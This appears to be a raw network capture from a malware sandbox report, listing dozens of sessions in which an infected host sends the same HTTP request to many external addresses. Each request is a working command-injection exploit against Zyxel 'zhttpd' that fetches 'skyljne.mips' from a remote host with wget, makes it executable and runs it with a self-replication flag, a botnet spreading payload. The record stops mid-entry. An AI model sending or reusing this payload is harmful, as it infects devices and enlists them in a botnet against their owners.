                                          Jan 14, 2024 15:46:10.870122910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3071192.168.2.2341720203.121.216.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870143890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3072192.168.2.23433265.105.134.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870160103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3073192.168.2.2360136184.33.176.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870184898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3074192.168.2.2346640133.131.222.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870189905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3075192.168.2.233669098.208.198.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870227098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3076192.168.2.233555058.102.86.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870253086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3077192.168.2.2347944216.205.200.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870284081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3078192.168.2.235267087.14.22.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870294094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3079192.168.2.235683025.247.12.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870306969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3080192.168.2.235220246.174.41.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870335102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3081192.168.2.2336204151.172.143.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870356083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3082192.168.2.235022024.99.84.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870363951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3083192.168.2.2360042183.200.99.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870407104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3084192.168.2.2344994160.202.17.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870445967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3085192.168.2.2344410114.75.116.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870451927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3086192.168.2.2337842156.73.156.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870464087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3087192.168.2.2341508193.211.174.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870505095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3088192.168.2.234474839.247.202.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870513916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3089192.168.2.234478439.189.93.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870557070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3090192.168.2.235941679.111.122.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870573044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3091192.168.2.2339658211.129.253.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870588064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3092192.168.2.2344100219.0.82.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870619059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3093192.168.2.2337264217.75.105.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870659113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3094192.168.2.2359434126.12.2.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870687008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3095192.168.2.234386036.226.51.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870703936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3096192.168.2.2356116221.104.42.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870724916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3097192.168.2.235072097.237.156.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870738983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3098192.168.2.2354298156.206.6.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870774984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3099192.168.2.235599036.253.38.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870807886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3100192.168.2.2349072132.185.229.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870851040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3101192.168.2.2345608179.65.128.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870862961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3102192.168.2.2341878101.197.238.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870873928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3103192.168.2.2359178195.49.0.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870907068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3104192.168.2.2347634206.17.185.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870918989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3105192.168.2.234281684.49.129.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870923996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3106192.168.2.2335318219.31.235.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870948076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3107192.168.2.233870280.181.209.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870973110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3108192.168.2.2342426183.21.182.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879137993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3109192.168.2.2348986108.160.146.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879160881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3110192.168.2.2346642187.107.72.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879208088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3111192.168.2.2335528195.129.146.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879234076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3112192.168.2.2336346161.143.112.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879256964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3113192.168.2.2359812164.5.111.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879277945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3114192.168.2.2347634205.84.228.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879288912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3115192.168.2.234407241.211.94.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879318953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3116192.168.2.2349482145.242.54.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879347086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3117192.168.2.2355822154.228.198.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879403114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3118192.168.2.235129438.84.233.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879415989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3119192.168.2.234215890.175.183.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879426003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3120192.168.2.2340740174.139.141.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879441023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3121192.168.2.235909095.181.151.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879517078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3122192.168.2.235438465.240.127.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879517078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3123192.168.2.2352404111.239.105.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879523039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3124192.168.2.234448494.240.219.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879532099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3125192.168.2.2333834170.219.166.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879565001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3126192.168.2.2336950205.11.43.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879570961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3127192.168.2.234752046.81.21.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879595995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3128192.168.2.2338330117.45.48.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879627943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3129192.168.2.235152242.151.38.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879637957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3130192.168.2.2336700210.170.66.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879677057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3131192.168.2.2349548114.90.86.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879710913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3132192.168.2.235919248.116.176.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879710913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3133192.168.2.2339504126.104.94.119443
                                          TimestampBytes transferredDirectionData
